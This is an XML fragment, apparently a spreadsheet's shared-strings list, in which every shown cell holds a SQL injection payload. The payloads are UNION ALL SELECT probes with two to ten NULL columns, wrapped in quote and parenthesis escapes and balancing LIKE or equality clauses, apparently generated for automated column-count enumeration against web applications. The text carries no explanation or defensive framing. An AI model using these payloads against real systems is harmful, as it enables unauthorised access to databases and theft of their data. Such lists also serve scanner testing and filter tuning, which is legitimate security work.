    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'wuTp' LIKE 'wuTp</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'CmVk' LIKE 'CmVk</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'LjyY' LIKE 'LjyY</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'Kmky' LIKE 'Kmky</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL-- AND   (  (   ( 'WpyD' LIKE 'WpyD</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL-- AND   (  (   ( 'nAut' LIKE 'nAut</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (   ( 'LoPY' LIKE 'LoPY</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'dKLo' LIKE 'dKLo</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'sYJP' LIKE 'sYJP</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'znUJ' LIKE 'znUJ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'KoQn' LIKE 'KoQn</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'YCGp' LIKE 'YCGp</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'qPKT' LIKE 'qPKT</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL-- AND 'MQEj' LIKE 'MQEj</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL-- AND 'WgMx' LIKE 'WgMx</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND 'gblC' LIKE 'gblC</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND 'yAsR' LIKE 'yAsR</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'mUzP' LIKE 'mUzP</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'TaYJ' LIKE 'TaYJ</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'WpvG' LIKE 'WpvG</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'crst' LIKE 'crst</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND  ( "jzqj" = "jzqj</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND  ( "Rmih" = "Rmih</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "HEwG" = "HEwG</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "KLYX" = "KLYX</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "SDkM" = "SDkM</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "vqyu" = "vqyu</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "TBNW" = "TBNW</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL-- AND   (  (  "rlTp" = "rlTp</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (  "WxKU" = "WxKU</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (  "jltK" = "jltK</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "oVGb" = "oVGb</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "yisi" = "yisi</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "rEMW" = "rEMW</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "Kbvd" = "Kbvd</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "KPOG" = "KPOG</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL-- AND   (  (   ( "uMWf" = "uMWf</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (   ( "pQPI" = "pQPI</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "ZduS" = "ZduS</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "byMC" = "byMC</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "wgzY" = "wgzY</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "tCiO" = "tCiO</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "aAvw" = "aAvw</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "ORXE" = "ORXE</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL-- AND "CqUW" = "CqUW</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND "ozXS" = "ozXS</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND "DaZB" = "DaZB</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "vxyJ" = "vxyJ</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "RFAK" = "RFAK</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "jSwW" = "jSwW</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "xjYr" = "xjYr</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL-- AND  ( "LPqh" LIKE "LPqh</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND  ( "BdSK" LIKE "BdSK</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND  ( "zTzN" LIKE "zTzN</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "tOTl" LIKE "tOTl</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "zDln" LIKE "zDln</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "Wmxd" LIKE "Wmxd</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "aYqg" LIKE "aYqg</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "pfsU" LIKE "pfsU</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL-- AND   (  (  "VAuV" LIKE "VAuV</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (  "ffds" LIKE "ffds</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (  "scbo" LIKE "scbo</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "PmnC" LIKE "PmnC</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "necp" LIKE "necp</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "atRz" LIKE "atRz</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "WLso" LIKE "WLso</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "DCgv" LIKE "DCgv</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL-- AND   (  (   ( "bpXs" LIKE "bpXs</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL-- AND   (  (   ( "tuhp" LIKE "tuhp</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (   ( "gWJQ" LIKE "gWJQ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "zkMh" LIKE "zkMh</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "UsKf" LIKE "UsKf</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "yOee" LIKE "yOee</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "ncyu" LIKE "ncyu</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "XtEf" LIKE "XtEf</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "Rlxi" LIKE "Rlxi</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL-- AND "cnYM" LIKE "cnYM</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL-- AND "osii" LIKE "osii</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND "FVVV" LIKE "FVVV</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND "yENh" LIKE "yENh</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "DMQb" LIKE "DMQb</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "FigJ" LIKE "FigJ</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "Zlro" LIKE "Zlro</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "Juev" LIKE "Juev</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND  ( 4190 = 4190</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND  ( 6662 = 6662</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 508 = 508</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 7877 = 7877</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 4677 = 4677</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 9998 = 9998</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 867 = 867</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (  2221 = 2221</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (  4714 = 4714</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  9483 = 9483</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  1780 = 1780</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  3166 = 3166</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  1049 = 1049</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  8338 = 8338</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL-- AND   (  (   ( 6917 = 6917</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (   ( 5424 = 5424</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 5794 = 5794</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 6957 = 6957</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 917 = 917</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 1371 = 1371</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 9181 = 9181</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 5338 = 5338</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND  ( 'XsnT' = 'XsnT</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND  ( 'IpUM' = 'IpUM</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'oTsd' = 'oTsd</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'YXxs' = 'YXxs</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'Mpac' = 'Mpac</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'hcjE' = 'hcjE</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'qGrb' = 'qGrb</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL-- AND   (  (  'ynkh' = 'ynkh</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (  'OpIg' = 'OpIg</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (  'gfQu' = 'gfQu</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'MMtU' = 'MMtU</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'BOVi' = 'BOVi</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'qlWf' = 'qlWf</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'vQeQ' = 'vQeQ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'vSFp' = 'vSFp</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL-- AND   (  (   ( 'lMmh' = 'lMmh</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (   ( 'vmoF' = 'vmoF</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'pRqL' = 'pRqL</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'MElC' = 'MElC</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'nsCb' = 'nsCb</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'nFdK' = 'nFdK</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'PyWA' = 'PyWA</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'pzvT' = 'pzvT</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL-- AND 'tUAf' = 'tUAf</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND 'sCFN' = 'sCFN</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND 'BXzG' = 'BXzG</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'dlvI' = 'dlvI</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'islv' = 'islv</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'UcKQ' = 'UcKQ</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'HAEb' = 'HAEb</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL-- AND  ( 'iiQF' LIKE 'iiQF</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND  ( 'IiMr' LIKE 'IiMr</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND  ( 'fEkD' LIKE 'fEkD</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'veRg' LIKE 'veRg</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'Sewv' LIKE 'Sewv</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'vfjm' LIKE 'vfjm</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'tuya' LIKE 'tuya</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'sPtz' LIKE 'sPtz</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL-- AND   (  (  'AZIC' LIKE 'AZIC</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (  'cznv' LIKE 'cznv</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (  'gFEP' LIKE 'gFEP</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'jJKQ' LIKE 'jJKQ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'qdXm' LIKE 'qdXm</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'nHvN' LIKE 'nHvN</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'JqGC' LIKE 'JqGC</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'qLxH' LIKE 'qLxH</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL-- AND   (  (   ( 'RHnQ' LIKE 'RHnQ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL-- AND   (  (   ( 'jarF' LIKE 'jarF</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (   ( 'YDjm' LIKE 'YDjm</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'lFxr' LIKE 'lFxr</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'VvGL' LIKE 'VvGL</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'uaeU' LIKE 'uaeU</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'jMeV' LIKE 'jMeV</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'ZlUG' LIKE 'ZlUG</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'DPSa' LIKE 'DPSa</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL-- AND 'cxyD' LIKE 'cxyD</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL-- AND 'kyHX' LIKE 'kyHX</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND 'xQLE' LIKE 'xQLE</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND 'cBkr' LIKE 'cBkr</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'YOnR' LIKE 'YOnR</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Fnaw' LIKE 'Fnaw</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'jcJh' LIKE 'jcJh</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Sfmc' LIKE 'Sfmc</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND  ( "DReD" = "DReD</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND  ( "KJdG" = "KJdG</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "jNdR" = "jNdR</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "YXpl" = "YXpl</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "hFYb" = "hFYb</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "fmak" = "fmak</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "Pgho" = "Pgho</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL-- AND   (  (  "xOKZ" = "xOKZ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (  "hpTs" = "hpTs</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (  "WBfS" = "WBfS</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "ZdUI" = "ZdUI</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "WrKh" = "WrKh</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "iqiT" = "iqiT</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "eWbW" = "eWbW</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "QUyE" = "QUyE</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL-- AND   (  (   ( "qstY" = "qstY</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (   ( "QaOy" = "QaOy</t>
  </si>
  <si>
